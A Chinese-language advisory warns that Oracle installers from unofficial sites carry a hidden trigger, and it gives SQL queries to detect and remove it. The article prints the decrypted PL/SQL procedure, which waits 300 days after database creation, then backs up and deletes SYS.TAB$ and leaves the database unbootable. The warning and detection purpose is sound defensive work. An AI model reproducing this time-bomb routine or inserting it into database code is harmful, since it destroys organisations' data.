Oracle数据库安装软件被注入病毒及数据库启动报ORA-600 16703错误,出现数据库字典被删除数据库损坏无法启动预警

栏目:eas cloud知识作者:金蝶来源:金蝶云社区发布:2024-09-22浏览:1

Oracle数据库安装软件被注入病毒及数据库启动报ORA-600 16703错误,出现数据库字典被删除数据库损坏无法启动预警

不知你们所在的企业的数据库系统是否有中招本文所讲的那个数据库病毒。如果还没有的话,请进行自检,避免中招后数据库无法启动,数据丢失。

1.对于Oracle数据库生产环境安装的数据库千万不要到不明的网站上下载数据库软件进行安装,不明网站下载的数据库软件很有可能带有病毒。建议到Oracle的官www.oracle.com上去下载,对于企业用,建议买正版的Oracle软件。
2.目前有发现从不明网站上下载的Oracle软件安装后,数据库用到大于300天,就会触发一个触发器把数据库字典TAB$表给清掉。数据库没有重启前,查任何一个表的记录信息,都会报ora-30372:表中不包启用户可见的列错误。此时建议检查下,在system用户下是否有TAB$表的ORACHK开头的备份表(system用户下的表,可在dba_objects视图中查是否存在),如果存在,把备份表中的数据插入到TAB$,然后把以下发现有病毒的触发器,存储过程删掉。 导出数据,重装从Oracle官网下载的数据库软件,再导入导出的数据到新的数据库中。
如果在没有做前面表修复前,重启了数据库服务,就会导致数据库重启报ORA-600 16703错误,数据库损坏启不来。则需要找第三方专业的数据库厂家用工具进行恢复。报错如下所示:
ORA-01092: ORACLE instance terminated. Disconnection forced
ORA-00704: bootstrap process failure
ORA-00704: bootstrap process failure
ORA-00600: internal error code, arguments: [16703], [1403], [20], [], [], [],
这个触发器执行的是加密后的存储过程代码(在数据库中看到存储过程DBMS_SUPPORT_DBMONITORP的内容是一些加密内容,如开头内容是a000000),存储过程,这个存储过程解密后的代码如下,其代码逻辑就是,判断数据库的创建时间大于 300 天,然后创建一个备份表,备份 tab$ 内容之后,清空 TAB$ 表。
此后,数据库当然就无法启动了:
以下是存储过程内容解密后的内容:
PROCEDURE DBMS_SUPPORT_DBMONITORP IS
DATE1 INT :=10;
BEGIN 
   SELECT TO_CHAR(SYSDATE-CREATED ) INTO DATE1 FROM V$DATABASE;
   IF (DATE1>=300) THEN 
   EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system  as select * from sys.tab$';
   DELETE SYS.TAB$;
   COMMIT;
   EXECUTE IMMEDIATE 'alter system checkpoint';
   END IF;
END;
用以下SQL语句看一下有没有那个触发器:
select * from dba_triggers  where trigger_name like 'DBMS_SUPPORT_DBMONITOR';
如果存在那个触发器,查下触发器的内容,看内容是否有执行DBMS_SUPPORT_DBMONITORP这个存储过程,如果有把那个触发器删掉。
用以下的SQL语句看一下有没有那个存储过程:
select * from dba_procedures  where object_name='DBMS_SUPPORT_DBMONITORP';
如果存在,查下内容是否跟以上说的一样,如果是的,把那个存储过程DROP删掉。
所以我们再次提示大家:由于这个攻击,具有潜伏性,如果你是从网络下载了Oracle安装包,尤其是 11.2.0.4 版本,建议用户检查你的数据库,确保安全。
由于 Oracle 的 11.2.0.4 版本要从 MOS 上下载,需要具有Oracle的授权,所以很多非授权用户从其他来源下载,就面临了风险。
参考链接:  https://blog.csdn.net/enmotech/article/details/81278756      (2018.07.29)


Oracle数据库安装软件被注入病毒及数据库启动报ORA-600 16703错误,出现数据库字典被删除数据库损坏无法启动预警

不知你们所在的企业的数据库系统是否有中招本文所讲的那个数据库病毒。如果还没有的话,请进行自检,避免中招后数据库无法启动,数据丢失。...
点击下载文档
确认删除?
回到顶部
客服QQ
  • 客服QQ点击这里给我发消息